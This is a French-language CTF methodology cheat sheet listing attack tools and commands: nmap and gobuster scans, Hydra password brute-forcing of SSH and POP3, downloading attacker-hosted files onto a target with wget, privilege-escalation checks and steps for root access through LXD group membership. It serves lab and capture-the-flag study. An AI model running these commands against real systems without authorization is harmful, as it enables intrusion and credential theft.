Outils
Outils utilisés dans la résolution des challenges.
1. nmap
Pour trouver et explorer la liste des ports ouverts
nmap $IP -A -p- -oN nmap.txt -T42. gobuster
Pour trouver la liste des répertoires et différents fichiers importants
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x ".php,.html,.txt,.zip" -u $IP -t50gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x ".php,.html,.txt,.zip" -u http://$IP:8080 -t50 -U <user> -P <password>3. Hydra
Hydra pour ssh
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://$IP:22 -t 64Hydra pour pop3
hydra -l <user> -P /usr/share/wordlists/rockyou.txt pop3://$IP -s <port> -t 64ou
hydra -l <user> -P /usr/share/wordlists/fasttrack.txt pop3://$IP -s <port> -t 64 Hydra pour http-get
4. Pspy64
Permet de trouver les process cron exécutés par root sans avoir les droits de root
https://github.com/DominicBreuker/pspy
5. Transfert de fichiers
Pour transférer des fichiers depuis la machine Kali vers la machine cible:
sur la machine Kali
aller dans le répertoire contenant les fichiers à transférer
python3 -m http.server
sur la machine cible
aller dans le répertoire /dev/shm
wget < kali tun0 IP>:8000/fichier.à.transférerrendre les fichiers exécutables avec
chmod +x
6. Privilege Escalation
Voici la méthode générique que j'utilise pour trouver les possibilités de 'privilege escalation'. Cette méthode est en partie basée sur l'article Linux Privilege Escalation: Automated Script.
sudo -l
getcap -r / 2>/dev/null
7. Consolidation d'un Shell
8. Escalade de privilèges via LXD
Basé sur cet article: LXC/LXD (Linux Container/Daemon) Privilege Escalation
Vérifiez que l'utilisateur sur la machine cible fait partie du groupe lxd
8.1 Sur la machine Kali
Préparez un conteneur linux et lancer un serveur http
8.2 Sur la machine cible
Téléchargez le fichier <alpine tar.gz> et importez-le comme image dans LXC
Créez un nouveau conteneur 'mycontainer' basé sur l'image 'myimage' qui vient d'être importée.
En cas de message “No storage pool found. Please create a new storage pool.” initialisez LXD d'abord et relancez la commande.
Montez (mount) le répertoire principal / dans le répertoire /mnt/root du conteneur 'mycontainer' que vous venez de créer
Démarrez votre conteneur
Lancez un Shell (note: l'image Alpine ne supporte qu'un shell sh)
Vérifiez que vous êtes bien root
Rendez-vous dans le répertoire principal de la machine cible monté en /mnt/root et accédez en tant que root à toutes les données de la machine
9. Outils Stéganographie
Pour trouver le mot de passe et extraire le fichier caché
Voici un lien vers une liste d'outils de stéganographie que j'utilise souvent
https://medium.com/@ria.banerjee005/steganography-tools-techniques-bba3f95c7148
On y retrouve notamment strings, steghide, stegseek et autres exiftools
10. WPscan
https://blog.sucuri.net/2023/12/wpscan-intro-how-to-scan-for-wordpress-vulnerabilities.html
11. FFUF
ffuf permet de trouver les sous-domaines d'un site donné
un exemple pratique dans la vidéo https://www.youtube.com/watch?v=AnJiRY3g5sg
12. Sites intéressants
https://juggernaut-sec.com/blog/ est rempli de procédures et de méthodes utilisées en hacking.
Mis à jour
Ce contenu vous a-t-il été utile ?